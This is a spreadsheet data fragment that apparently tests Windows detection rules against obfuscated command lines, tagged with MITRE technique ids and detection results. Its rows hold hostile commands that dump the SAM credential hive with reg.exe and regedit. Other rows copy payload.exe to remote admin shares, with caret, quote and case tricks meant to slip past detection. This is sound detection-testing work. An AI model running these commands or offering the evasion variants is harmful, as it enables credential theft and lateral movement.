    <row r="2090" ht="15.75" customHeight="1" s="42"/>
    <row r="2091" ht="15.75" customHeight="1" s="42"/>
    <row r="2092" ht="15.75" customHeight="1" s="42"/>
    <row r="2093" ht="15.75" customHeight="1" s="42"/>
    <row r="2094" ht="15.75" customHeight="1" s="42"/>
    <row r="2095" ht="15.75" customHeight="1" s="42"/>
    <row r="2096" ht="15.75" customHeight="1" s="42"/>
    <row r="2097" ht="15.75" customHeight="1" s="42"/>
    <row r="2098" ht="15.75" customHeight="1" s="42"/>
    <row r="2099" ht="15.75" customHeight="1" s="42"/>
    <row r="2100" ht="15.75" customHeight="1" s="42"/>
    <row r="2101" ht="15.75" customHeight="1" s="42"/>
    <row r="2102" ht="15.75" customHeight="1" s="42"/>
    <row r="2103" ht="15.75" customHeight="1" s="42"/>
    <row r="2104" ht="15.75" customHeight="1" s="42"/>
    <row r="2105" ht="15.75" customHeight="1" s="42"/>
    <row r="2106" ht="15.75" customHeight="1" s="42"/>
    <row r="2107" ht="15.75" customHeight="1" s="42"/>
    <row r="2108" ht="15.75" customHeight="1" s="42"/>
    <row r="2109" ht="15.75" customHeight="1" s="42"/>
    <row r="2110" ht="15.75" customHeight="1" s="42"/>
    <row r="2111" ht="15.75" customHeight="1" s="42"/>
    <row r="2112" ht="15.75" customHeight="1" s="42"/>
    <row r="2113" ht="15.75" customHeight="1" s="42"/>
    <row r="2114" ht="15.75" customHeight="1" s="42"/>
    <row r="2115" ht="15.75" customHeight="1" s="42"/>
    <row r="2116" ht="15.75" customHeight="1" s="42"/>
    <row r="2117" ht="15.75" customHeight="1" s="42"/>
    <row r="2118" ht="15.75" customHeight="1" s="42"/>
    <row r="2119" ht="15.75" customHeight="1" s="42"/>
    <row r="2120" ht="15.75" customHeight="1" s="42"/>
    <row r="2121" ht="15.75" customHeight="1" s="42"/>
    <row r="2122" ht="15.75" customHeight="1" s="42"/>
    <row r="2123" ht="15.75" customHeight="1" s="42"/>
    <row r="2124" ht="15.75" customHeight="1" s="42"/>
    <row r="2125" ht="15.75" customHeight="1" s="42"/>
    <row r="2126" ht="15.75" customHeight="1" s="42"/>
    <row r="2127" ht="15.75" customHeight="1" s="42"/>
    <row r="2128" ht="15.75" customHeight="1" s="42"/>
    <row r="2129" ht="15.75" customHeight="1" s="42"/>
    <row r="2130" ht="15.75" customHeight="1" s="42"/>
    <row r="2131" ht="15.75" customHeight="1" s="42"/>
    <row r="2132" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K1954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2" min="1" max="1"/>
    <col width="43" customWidth="1" style="42" min="2" max="2"/>
    <col width="42.14" customWidth="1" style="42" min="3" max="3"/>
    <col width="38.71" customWidth="1" style="42" min="4" max="4"/>
    <col width="43" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="18" customWidth="1" style="42" min="9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6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B2" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C2" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D2" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E2" s="6" t="inlineStr">
        <is>
          <t>reg.exe sav^e HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="4" t="n"/>
      <c r="J2" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K2" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="4" t="n"/>
      <c r="B3" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C3" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D3" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E3" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="4" t="n"/>
      <c r="J3" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="4" t="n"/>
      <c r="B4" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_keys</t>
        </is>
      </c>
      <c r="C4" s="6" t="inlineStr">
        <is>
          <t>Exports Registry Key To a File</t>
        </is>
      </c>
      <c r="D4" s="6" t="inlineStr">
        <is>
          <t>f0e53e89-8d22-46ea-9db5-9d4796ee2f8a</t>
        </is>
      </c>
      <c r="E4" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-Item -Path 'HKCU:\Software' | Export-Clixml -Path 'C:\temp\export.xml'"</t>
        </is>
      </c>
      <c r="F4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="4" t="n"/>
      <c r="J4" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B5" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C5" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D5" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E5" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="4" t="n"/>
      <c r="J5" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B6" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C6" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D6" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E6" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="4" t="n"/>
      <c r="J6" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K6" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B7" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C7" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D7" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E7" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="4" t="n"/>
      <c r="J7" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B8" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C8" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D8" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E8" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="4" t="n"/>
      <c r="J8" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B9" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C9" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D9" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E9" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="4" t="n"/>
      <c r="J9" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B10" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C10" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D10" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E10" s="6" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F10" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="4" t="n"/>
      <c r="J10" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="6" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B11" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C11" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D11" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E11" s="6" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F11" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="4" t="n"/>
      <c r="J11" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B12" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C12" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D12" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E12" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /C \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F12" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="4" t="n"/>
      <c r="J12" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B13" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C13" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D13" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E13" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F13" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="4" t="n"/>
      <c r="J13" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B14" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C14" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D14" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E14" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F14" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="4" t="n"/>
      <c r="J14" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B15" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C15" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D15" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E15" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F15" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="4" t="n"/>
      <c r="J15" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B16" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C16" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D16" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E16" s="6" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F16" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="4" t="n"/>
      <c r="J16" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B17" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C17" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D17" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E17" s="6" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F17" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="4" t="n"/>
      <c r="J17" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="6" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B18" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C18" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D18" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E18" s="6" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F18" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="4" t="n"/>
      <c r="J18" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="4" t="n"/>
      <c r="B19" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C19" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D19" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E19" s="6" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F19" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="4" t="n"/>
      <c r="J19" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="4" t="n"/>
      <c r="B20" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C20" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D20" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E20" s="6" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F20" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="4" t="n"/>
      <c r="J20" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="4" t="n"/>
      <c r="B21" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C21" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D21" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E21" s="6" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F21" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="4" t="n"/>
      <c r="J21" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="4" t="n"/>
      <c r="B22" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C22" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D22" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E22" s="6" t="inlineStr">
        <is>
          <t>powershell -nopROfilE -"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F22" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="4" t="n"/>
      <c r="J22" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="4" t="n"/>
      <c r="B23" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C23" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D23" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E23" s="6" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F23" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="4" t="n"/>
      <c r="J23" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="4" t="n"/>
      <c r="B24" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C24" s="6" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D24" s="6" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E24" s="6" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F24" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="4" t="n"/>
      <c r="J24" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B25" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C25" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D25" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E25" s="6" t="inlineStr">
        <is>
          <t>regedit.exe /E C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F25" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G25" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H25" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="6" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1); Exports Registry Key To a File (f0e53e89-8d22-46ea-9db5-9d4796ee2f8a)</t>
        </is>
      </c>
      <c r="J25" s="6" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="6" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B26" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_export_critical_keys</t>
        </is>
      </c>
      <c r="C26" s="6" t="inlineStr">
        <is>
          <t>Exports Critical Registry Keys To a File</t>
        </is>
      </c>
      <c r="D26" s="6" t="inlineStr">
        <is>
          <t>82880171-b475-4201-b811-e9c826cd5eaa</t>
        </is>
      </c>
      <c r="E26" s="6" t="inlineStr">
        <is>
          <t>regedit.exe -"E" C:\temp\sam.reg "HKLM\SAM"</t>
        </is>
      </c>
      <c r="F26" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G26" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H26" s="6" t="b">
        <v>0</v>
